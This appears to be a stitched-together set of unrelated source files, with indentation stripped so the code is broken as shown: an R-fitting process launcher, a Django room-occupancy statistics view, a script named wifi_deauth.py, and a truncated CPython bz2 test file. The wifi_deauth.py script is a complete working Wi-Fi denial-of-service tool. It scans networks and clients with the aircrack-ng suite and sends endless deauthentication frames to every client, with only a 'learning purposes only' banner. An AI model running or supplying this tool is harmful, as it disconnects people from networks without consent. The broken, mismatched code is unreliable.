## world_mcmc_fit_calendar_time.R or
## world_mcmc_fit_pandemic_time.R
##
##
## start/end: currently set to fit top 120 locations
##
def f(start,end):
os.system("time Rscript world_mcmc_fit_calendar_time.R "+str(start)+" "+str(end))
nthreads = 12
start=np.array([i for i in range(1, 120,10)])
end=np.array([i for i in range(10,121,10)])
if __name__ == '__main__':
info('main line')
p1 = Process(target=f,args=(start[0],end[0],))
p1.start()
p2 = Process(target=f,args=(start[1],end[1],))
p2.start()
p3 = Process(target=f,args=(start[2],end[2],))
p3.start()
p4 = Process(target=f,args=(start[3],end[3],))
p4.start()
p5 = Process(target=f,args=(start[4],end[4],))
p5.start()
p6 = Process(target=f,args=(start[5],end[5],))
p6.start()
p7 = Process(target=f,args=(start[6],end[6],))
p7.start()
p8 = Process(target=f,args=(start[7],end[7],))
p8.start()
p9 = Process(target=f,args=(start[8],end[8],))
p9.start()
p10 = Process(target=f,args=(start[9],end[9],))
p10.start()
p11 = Process(target=f,args=(start[10],end[10],))
p11.start()
p12 = Process(target=f,args=(start[11],end[11],))
p12.start()
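# Hedged alternative (not in the original script): the twelve explicit
# Process blocks above could also be launched and joined in a loop over the
# same start/end arrays, e.g.:
#   procs = [Process(target=f, args=(start[i], end[i])) for i in range(nthreads)]
#   for p in procs:
#       p.start()
#   for p in procs:
#       p.join()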
|
views.py
|
from django.shortcuts import render
from stats.models import StatsLog, Day, Month, Year
from django.http import HttpResponse
#from datetime import datetime
from django.core.cache import cache
import time
import datetime
import threading
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import os
from floor.models import Room
from django.db.models import Sum, Avg, F
from django.contrib.auth.decorators import login_required
from .forms import RoomRequestForm
def get_stats(ID):
stats = {}
stats['day'] = Day.objects.filter(roomID=ID)
stats['month'] = Month.objects.filter(roomID=ID)
stats['year'] = Year.objects.filter(roomID=ID)
stats['ID'] = ID
return stats
def createGraph(stats, duration=''):
# remove old graphs
if os.path.exists('stats/static/days.png') and duration == 'day':
os.remove('stats/static/days.png')
if os.path.exists('stats/static/months.png') and duration == 'month':
os.remove('stats/static/months.png')
if os.path.exists('stats/static/years.png') and duration == 'year':
os.remove('stats/static/years.png')
x = []
y = []
z = []
for obj in stats:
x.append(obj.date)
y.append(obj.totalOccupants)
z.append(obj.avgOccLength.total_seconds()/60.0)
fig, (ax1, ax2) = plt.subplots(1, 2)
plt.subplots_adjust(left=.125, right=.9, bottom=.1, top=.9, wspace=.2, hspace=.2)
ax1.bar(x, y, align='center', alpha=0.5)
ax2.bar(x, z, align='center', alpha=0.5)
fig.autofmt_xdate()
fig.set_figheight(10)
fig.set_figwidth(15)
ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
ax2.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
ax1.set_xlabel('Date')
ax2.set_xlabel('Date')
ax1.set_ylabel('Total Occupants')
ax2.set_ylabel('Average Occupancy Time (minutes)')
if duration == 'day':
fig.suptitle('Total Occupants & Average Occupancy Time for Days')
plt.savefig('stats/static/days.png')
elif duration == 'month':
fig.suptitle('Total Occupants & Average Occupancy Time for Months')
plt.savefig('stats/static/months.png')
elif duration == 'year':
fig.suptitle('Total Occupants & Average Occupancy Time for Years')
plt.savefig('stats/static/years.png')
plt.close()
@login_required
def index(request):
'''
@return display of stats page
'''
if request.method == 'POST':
form = RoomRequestForm(request.POST)
if form.is_valid():
stats = get_stats(form.data['room'])
# create and save new graphs
createGraph(stats['day'], duration='day')
createGraph(stats['month'], duration='month')
createGraph(stats['year'], duration='year')
return render(request, 'stats/templates/html/stats.html', {'stats':stats})
else:
form = RoomRequestForm()
return render(request, 'stats/templates/html/stats.html', {'form': form})
def log(rID, e):
currLog = StatsLog(event = e, roomID = rID, date = datetime.datetime.now())
currLog.save()
def createTimeObject(ID, duration, now):
timeObject = None
if duration == "day":
timeObject = Day()
elif duration == "month":
timeObject = Month()
elif duration == "year":
timeObject = Year()
else:
print("ERROR: INVALID TIME OBJECT REQUEST")
timeObject.date = now
timeObject.roomID = ID
logList = importLog(ID, now, duration)
# print("New timeObject time:", timeObject.date)
# print("Duration:", duration)
# print("timeObject type:", type(timeObject))
timeObject.totalOccupants = getOccupants(logList)
timeObject.avgOccLength = calcAvgOccLength(logList)
if timeObject.avgOccLength == 0:
timeObject.avgOccLength = datetime.timedelta()
timeObject.save()
def threadf(name):
'''
Separate thread which creates time objects
every hour/day/month/year. Every time one of
those passes, create an object with information
from logs for each room
'''
start = datetime.datetime.now()
last = start
floor3IDs = cache.get('floor3')
floor4IDs = cache.get('floor4')
now = datetime.datetime.now()
while True:
time.sleep(5)
now = datetime.datetime.now()
entered = False
if now.day != last.day:
for ID in floor3IDs:
createTimeObject(ID,"day", last)
for ID in floor4IDs:
createTimeObject(ID,"day", last)
entered = True
if now.month != last.month:
for ID in floor3IDs:
createTimeObject(ID,"month", last)
for ID in floor4IDs:
createTimeObject(ID,"month", last)
entered = True
if now.year != last.year:
for ID in floor3IDs:
createTimeObject(ID,"year", last)
for ID in floor4IDs:
createTimeObject(ID,"year", last)
entered = True
if entered:
last = now
def startThread():
print("Starting Thread")
t = threading.Thread(target=threadf, args=(1,))
t.setDaemon(True)
t.start()
def importLog(ID, now, duration):
query = None
#Finds different events depending on the RoomID and the day/month/year and then returns those events
if duration == 'day':
query = StatsLog.objects.filter(roomID=ID,date__month=now.month, date__day=now.day)
elif duration == 'month':
query = StatsLog.objects.filter(roomID=ID, date__year=now.year, date__month=now.month)
elif duration == 'year':
query = StatsLog.objects.filter(roomID=ID, date__year=now.year)
return query
def getOccupants(query):
'''
Return the number of people in the room.
Gets information from logs.
Returns the amount of events in the log
divided by two since everyone that enters a
room has to exit the room.
'''
return int(len(query)/2)
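# Worked example (illustrative, not in the original code): a room with three
# visits produces six StatsLog events (3 entries + 3 exits), so
# getOccupants() returns int(6/2) == 3.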
def calcTimeDifference(query):
#calculates the time difference between the FIRST person entering the room and when the first person leaves the room
#This is to help handle the issue of multiple people entering and then leaving a room
timeDiff = []
tmp_entry = None
for log in query:
# if the log contains entry data
if log.event == 1 and tmp_entry == None:
tmp_entry = log
# else the log contains exit data (and doesn't start with exit data)
elif log.event == 0 and tmp_entry != None:
timeDiff.append(log.date - tmp_entry.date)
tmp_entry = None
return timeDiff
def calcAvgOccLength(query):
'''
Return the average amount of time
the room has spent occupied.
Gets information from logs.
'''
timeDiff = calcTimeDifference(query)
if len(timeDiff) != 0:
return sum(timeDiff, datetime.timedelta(0)) / len(timeDiff)
else:
return 0
|
wifi_deauth.py
|
#!/usr/bin/python3
import csv
from datetime import datetime
import os
import re
import shutil
import subprocess
import threading
import time
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
result = subprocess.run(["iw", "dev"], capture_output = True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
subprocess.run(["ip", "link", "set", wifi_name, "down"])
subprocess.run(["airmon-ng", "check", "kill"])
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
elif choice == "1":
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
else:
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
directory = os.getcwd()
try:
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
timestamp = datetime.now()
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
if len(lst) == 0:
return check_status
for item in lst:
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
subprocess.call("clear", shell = True)
for file_name in os.listdir():
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames = fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout = subprocess.DEVNULL, stderr = subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
print(r"""__ _____ _____ ___
\ \ / /_ _| ___|_ _|
\ \ /\ / / | || |_ | |
\ V V / | || _| | |
\_/\_/ |___|_| |___|
____ _ _ _ _ _ _
| _ \ ___ / \ _ _| |_| |__ ___ _ __ | |_(_) ___ __ _| |_ ___ _ __
| | | |/ _ \ / _ \| | | | __| '_ \ / _ \ '_ \| __| |/ __/ _` | __/ _ \| '__|
| |_| | __// ___ \ |_| | |_| | | | __/ | | | |_| | (_| (_| | || (_) | |
|____/ \___/_/ \_\__,_|\__|_| |_|\___|_| |_|\__|_|\___\__,_|\__\___/|_|
______ _ ___ ______
/ / _ \ __| |/ _ \/ ___\ \
| || | | |/ _` | | | \___ \| |
| || |_| | (_| | |_| |___) | |
| ||____/ \__,_|\___/|____/| |
\_\ /_/
""")
print("\n****************************************************************")
print("\n* Created for learning purposes only ! *")
print("\n* https://github.com/rexdivakar/rexdivakar-Wifi-dDOS *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
macs_not_to_kick_off = list()
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
macs_not_to_kick_off = mac_address_regex.findall(macs)
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
network_controllers = find_nic()
if len(network_controllers) == 0:
print("Please connect a network interface controller and try again!")
exit()
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
wifi_name = network_controllers[int(controller_choice)]
set_monitor_mode(wifi_name)
set_band_to_monitor(band_choice)
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
get_clients(hackbssid, hackchannel, wifi_name)
active_clients = set()
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
subprocess.call("clear", shell = True)
for file_name in os.listdir():
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames = fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
print(f"{item}")
if item not in threads_started:
threads_started.append(item)
t = threading.Thread(target = deauth_attack, args = [hackbssid, item, wifi_name], daemon = True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
set_into_managed_mode(wifi_name)
|
test_bz2.py
|
from test import test_support
from test.test_support import TESTFN, _4G, bigmemtest, import_module, findfile
import unittest
from cStringIO import StringIO
import os
import subprocess
import sys
try:
import threading
except ImportError:
threading = None
bz2 = import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = sys.platform not in ("win32", "os2emx", "riscos")
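# Where a command-line bunzip2 exists, BaseTest.decompress shells out to it so
# the module's output is cross-checked against an independent implementation;
# otherwise it falls back to bz2.decompress().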
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT = 'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/var/ftp:/bin/bash\nnobody:x:65534:65534:Nobody:/home:\npostfix:x:100:101:postfix:/var/spool/postfix:\nniemeyer:x:500:500::/home/niemeyer:/bin/bash\npostgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\nmysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\nwww:x:103:104::/var/www:/bin/false\n'
DATA = 'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
DATA_CRLF = 'BZh91AY&SY\xaez\xbbN\x00\x01H\xdf\x80\x00\x12@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe0@\x01\xbc\xc6`\x86*\x8d=M\xa9\x9a\x86\xd0L@\x0fI\xa6!\xa1\x13\xc8\x88jdi\x8d@\x03@\x1a\x1a\x0c\x0c\x83 \x00\xc4h2\x19\x01\x82D\x84e\t\xe8\x99\x89\x19\x1ah\x00\r\x1a\x11\xaf\x9b\x0fG\xf5(\x1b\x1f?\t\x12\xcf\xb5\xfc\x95E\x00ps\x89\x12^\xa4\xdd\xa2&\x05(\x87\x04\x98\x89u\xe40%\xb6\x19\'\x8c\xc4\x89\xca\x07\x0e\x1b!\x91UIFU%C\x994!DI\xd2\xfa\xf0\xf1N8W\xde\x13A\xf5\x9cr%?\x9f3;I45A\xd1\x8bT\xb1<l\xba\xcb_\xc00xY\x17r\x17\x88\x08\x08@\xa0\ry@\x10\x04$)`\xf2\xce\x89z\xb0s\xec\x9b.iW\x9d\x81\xb5-+t\x9f\x1a\'\x97dB\xf5x\xb5\xbe.[.\xd7\x0e\x81\xe7\x08\x1cN`\x88\x10\xca\x87\xc3!"\x80\x92R\xa1/\xd1\xc0\xe6mf\xac\xbd\x99\xcca\xb3\x8780>\xa4\xc7\x8d\x1a\\"\xad\xa1\xabyBg\x15\xb9l\x88\x88\x91k"\x94\xa4\xd4\x89\xae*\xa6\x0b\x10\x0c\xd6\xd4m\xe86\xec\xb5j\x8a\x86j\';\xca.\x01I\xf2\xaaJ\xe8\x88\x8cU+t3\xfb\x0c\n\xa33\x13r2\r\x16\xe0\xb3(\xbf\x1d\x83r\xe7M\xf0D\x1365\xd8\x88\xd3\xa4\x92\xcb2\x06\x04\\\xc1\xb0\xea//\xbek&\xd8\xe6+t\xe5\xa1\x13\xada\x16\xder5"w]\xa2i\xb7[\x97R \xe2IT\xcd;Z\x04dk4\xad\x8a\t\xd3\x81z\x10\xf1:^`\xab\x1f\xc5\xdc\x91N\x14$+\x9e\xae\xd3\x80'
EMPTY_DATA = 'BZh9\x17rE8P\x90\x00\x00\x00\x00'
if has_cmdline_bunzip2:
def decompress(self, data):
pop = subprocess.Popen("bunzip2", shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
pop.stdin.write(data)
pop.stdin.close()
ret = pop.stdout.read()
pop.stdout.close()
if pop.wait() != 0:
ret = bz2.decompress(data)
return ret
else:
# bunzip2 isn't available to run on Windows.
def decompress(self, data):
return bz2.decompress(data)
class BZ2FileTest(BaseTest):
"Test BZ2File type miscellaneous methods."
def setUp(self):
self.filename = TESTFN
def tearDown(self):
test_support.gc_collect()
if os.path.isfile(self.filename):
os.unlink(self.filename)
def createTempFile(self, crlf=0):
with open(self.filename, "wb") as f:
if crlf:
data = self.DATA_CRLF
else:
data = self.DATA
f.write(data)
def testRead(self):
# "Test BZ2File.read()"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, None)
self.assertEqual(bz2f.read(), self.TEXT)
def testRead0(self):
# "Test BZ2File.read(0)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.read, None)
self.assertEqual(bz2f.read(0), "")
def testReadChunk10(self):
# "Test BZ2File.read() in chunks of 10 bytes"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
text = ''
while 1:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, self.TEXT)
def testRead100(self):
# "Test BZ2File.read(100)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertEqual(bz2f.read(100), self.TEXT[:100])
def testReadLine(self):
# "Test BZ2File.readline()"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readline, None)
sio = StringIO(self.TEXT)
for line in sio.readlines():
self.assertEqual(bz2f.readline(), line)
def testReadLines(self):
# "Test BZ2File.readlines()"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.readlines, None)
sio = StringIO(self.TEXT)
self.assertEqual(bz2f.readlines(), sio.readlines())
def testIterator(self):
# "Test iter(BZ2File)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
sio = StringIO(self.TEXT)
self.assertEqual(list(iter(bz2f)), sio.readlines())
def testClosedIteratorDeadlock(self):
# "Test that iteration on a closed bz2file releases the lock."
# http://bugs.python.org/issue3309
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, bz2f.next)
# This call will deadlock if the above .next call failed to
# release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testXReadLines(self):
# "Test BZ2File.xreadlines()"
self.createTempFile()
bz2f = BZ2File(self.filename)
sio = StringIO(self.TEXT)
self.assertEqual(list(bz2f.xreadlines()), sio.readlines())
bz2f.close()
def testUniversalNewlinesLF(self):
# "Test BZ2File.read() with universal newlines (\\n)"
self.createTempFile()
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\n")
bz2f.close()
def testUniversalNewlinesCRLF(self):
# "Test BZ2File.read() with universal newlines (\\r\\n)"
self.createTempFile(crlf=1)
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\r\n")
bz2f.close()
def testWrite(self):
# "Test BZ2File.write()"
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
with open(self.filename, 'rb') as f:
self.assertEqual(self.decompress(f.read()), self.TEXT)
def testWriteChunks10(self):
# "Test BZ2File.write() with chunks of 10 bytes"
with BZ2File(self.filename, "w") as bz2f:
n = 0
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
with open(self.filename, 'rb') as f:
self.assertEqual(self.decompress(f.read()), self.TEXT)
def testWriteLines(self):
# "Test BZ2File.writelines()"
with BZ2File(self.filename, "w") as bz2f:
self.assertRaises(TypeError, bz2f.writelines)
sio = StringIO(self.TEXT)
bz2f.writelines(sio.readlines())
# patch #1535500
self.assertRaises(ValueError, bz2f.writelines, ["a"])
with open(self.filename, 'rb') as f:
self.assertEqual(self.decompress(f.read()), self.TEXT)
def testWriteMethodsOnReadOnlyFile(self):
with BZ2File(self.filename, "w") as bz2f:
bz2f.write("abc")
with BZ2File(self.filename, "r") as bz2f:
self.assertRaises(IOError, bz2f.write, "a")
self.assertRaises(IOError, bz2f.writelines, ["a"])
def testSeekForward(self):
# "Test BZ2File.seek(150, 0)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
def testSeekBackwards(self):
# "Test BZ2File.seek(-150, 1)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
def testSeekBackwardsFromEnd(self):
# "Test BZ2File.seek(-150, 2)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
def testSeekPostEnd(self):
# "Test BZ2File.seek(150000)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
def testSeekPostEndTwice(self):
# "Test BZ2File.seek(150000) twice"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
def testSeekPreStart(self):
# "Test BZ2File.seek(-150, 0)"
self.createTempFile()
with BZ2File(self.filename) as bz2f:
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
def testOpenDel(self):
# "Test opening and deleting a file many times"
self.createTempFile()
for i in xrange(10000):
o = BZ2File(self.filename)
del o
if i % 100 == 0:
test_support.gc_collect()
def testOpenNonexistent(self):
# "Test opening a nonexistent file"
self.assertRaises(IOError, BZ2File, "/non/existent")
def testModeU(self):
# Bug #1194181: bz2.BZ2File opened for write with mode "U"
self.createTempFile()
bz2f = BZ2File(self.filename, "U")
bz2f.close()
f = file(self.filename)
f.seek(0, 2)
self.assertEqual(f.tell(), len(self.DATA))
f.close()
def testBug1191043(self):
# readlines() for files containing no newline
data = 'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
with open(self.filename, "wb") as f:
f.write(data)
with BZ2File(self.filename) as bz2f:
lines = bz2f.readlines()
self.assertEqual(lines, ['Test'])
with BZ2File(self.filename) as bz2f:
xlines = list(bz2f.readlines())
self.assertEqual(xlines, ['Test'])
def testContextProtocol(self):
# BZ2File supports the context management protocol
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1 // 0
except ZeroDivisionError:
pass
else:
self.fail("1 // 0 didn't raise an exception")
@unittest.skipUnless(threading, 'Threading required for this test.')
def testThreading(self):
# Using a BZ2File from several threads doesn't deadlock (issue #7205).
data = "1" * 2**20
nthreads = 10
with bz2.BZ2File(self.filename, 'wb') as f:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
@test_support.impl_detail()
def testMixedIterationReads(self):
# Issue #8397: mixed iteration and reads should be forbidden.
with bz2.BZ2File(self.filename, 'wb') as f:
# The internal buffer size is hard-wired to 8192 bytes, we must
# write out more than that for the test to stop halfway through
# the buffer.
f.write(self.TEXT * 100)
with bz2.BZ2File(self.filename, 'rb') as f:
next(f)
self.assertRaises(ValueError, f.read)
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
@unittest.skipIf(sys.platform == 'win32',
'test depends on being able to delete a still-open file,'
' which is not possible on Windows')
def testInitNonExistentFile(self):
# Issue #19878: Should not segfault when __init__ with non-existent
# file for the second time.
self.createTempFile()
# Test close():
with BZ2File(self.filename, "wb") as f:
self.assertRaises(IOError, f.__init__, "non-existent-file")
# Test object deallocation without call to close():
f = bz2.BZ2File(self.filename)
self.assertRaises(IOError, f.__init__, "non-existent-file")
del f
class BZ2CompressorTest(BaseTest):
def testCompress(self):
# "Test BZ2Compressor.compress()/flush()"
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
def testCompressEmptyString(self):
# "Test BZ2Compressor.compress()/flush() of empty string"
bz2c = BZ2Compressor()
data = bz2c.compress('')
data += bz2c.flush()
self.assertEqual(data, self.EMPTY_DATA)
def testCompressChunks10(self):
# "Test BZ2Compressor.compress()/flush() with chunks of 10 bytes"
bz2c = BZ2Compressor()
n = 0
data = ''
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
@bigmemtest(_4G, memuse=1.25)
def testBigmem(self, size):
text = "a" * size
bz2c = bz2.BZ2Compressor()
data = bz2c.compress(text) + bz2c.flush()
del text
text = self.decompress(data)
self.assertEqual(len(text), size)
self.assertEqual(text.strip("a"), "")
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
